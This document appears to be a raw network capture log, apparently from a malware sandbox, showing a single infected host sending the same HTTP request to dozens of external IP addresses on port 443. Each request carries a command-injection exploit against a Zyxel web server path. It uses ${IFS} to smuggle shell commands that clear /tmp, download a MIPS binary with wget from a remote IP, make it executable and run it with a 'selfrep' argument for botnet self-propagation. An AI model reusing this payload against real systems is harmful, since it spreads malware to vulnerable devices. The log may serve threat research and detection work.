                                          Jan 14, 2024 15:46:11.882108927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3197192.168.2.2351046144.174.202.26443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.882184982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3198192.168.2.2359788167.254.58.87443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.882260084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3199192.168.2.233493494.134.94.140443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.882333040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3200192.168.2.2334688194.190.87.88443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.882431984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3201192.168.2.234078441.91.150.12443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.882531881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3202192.168.2.233789019.70.153.42443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.882608891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3203192.168.2.2347786197.110.224.225443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.882708073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3204192.168.2.234798088.164.85.81443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.882792950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3205192.168.2.234466439.51.33.20443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.882867098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3206192.168.2.235456435.219.181.131443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.882962942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3207192.168.2.2333792207.105.166.159443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.883029938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3208192.168.2.2342816117.235.195.242443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.883102894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3209192.168.2.23529444.134.154.22443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.883204937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3210192.168.2.2339258202.55.193.86443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.883336067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3211192.168.2.2352564134.96.129.182443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.883399963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3212192.168.2.235791092.0.142.31443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.883497953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3213192.168.2.235712042.242.133.98443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.883615017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3214192.168.2.23496342.48.20.64443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.883692980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3215192.168.2.236050685.62.166.253443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.883826971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3216192.168.2.2335690131.25.252.26443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.883867979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3217192.168.2.234717419.236.98.171443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.884006977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3218192.168.2.233999292.82.234.46443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.884048939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3219192.168.2.2344578137.39.117.119443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.884078026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3220192.168.2.234811899.125.82.22443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.884119034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3221192.168.2.2334488191.111.253.72443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.884172916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3222192.168.2.2357250197.177.67.74443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.884202957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3223192.168.2.234180053.57.252.121443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.884207964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3224192.168.2.2360988123.172.213.254443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.884248018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3225192.168.2.2353130164.177.118.200443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.884263039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3226192.168.2.2350614114.86.26.5443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.884296894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3227192.168.2.235708697.175.215.3443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.884315968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3228192.168.2.2351348188.248.54.112443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.884339094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3229192.168.2.235006258.211.226.146443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.884371996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3230192.168.2.2344118207.245.67.33443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.884402037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3231192.168.2.235739660.44.170.60443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.884429932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3232192.168.2.2359722153.238.223.168443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.884468079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3233192.168.2.235282878.127.54.129443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.884469032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3234192.168.2.233532685.13.82.25443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.884515047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3235192.168.2.2357656222.59.42.221443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.884543896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3236192.168.2.234601499.26.189.127443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.884573936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3237192.168.2.2346500126.136.191.106443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.884597063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3238192.168.2.234004064.201.186.186443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.884644032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3239192.168.2.233646432.51.16.7443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.884673119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3240192.168.2.2337350210.187.16.191443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.884690046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3241192.168.2.234865244.196.40.23443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.884711027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3242192.168.2.234383879.200.49.2443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.884769917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3243192.168.2.2332826220.166.177.36443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.884789944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3244192.168.2.2337868204.181.250.98443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.884826899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3245192.168.2.235066658.191.244.199443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.884855032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3246192.168.2.2344320182.135.27.57443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.884860039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3247192.168.2.233353219.162.44.66443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.884879112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3248192.168.2.234006620.155.206.73443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.884892941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3249192.168.2.233791242.208.212.24443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.884933949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3250192.168.2.2359750158.135.28.187443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.884949923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3251192.168.2.2345034118.0.188.46443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.884989023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3252192.168.2.23527864.60.121.120443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.884999990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3253192.168.2.2359066167.115.196.64443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.885054111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3254192.168.2.2351472130.202.190.36443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.885076046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3255192.168.2.2339734126.11.33.234443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.885090113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3256192.168.2.23533849.149.27.108443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.885106087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3257192.168.2.2357024134.83.88.162443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.885132074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3258192.168.2.2351802151.8.37.128443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.885179996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3259192.168.2.233718062.54.187.137443
                                          TimestampBytes transferredDirectionData
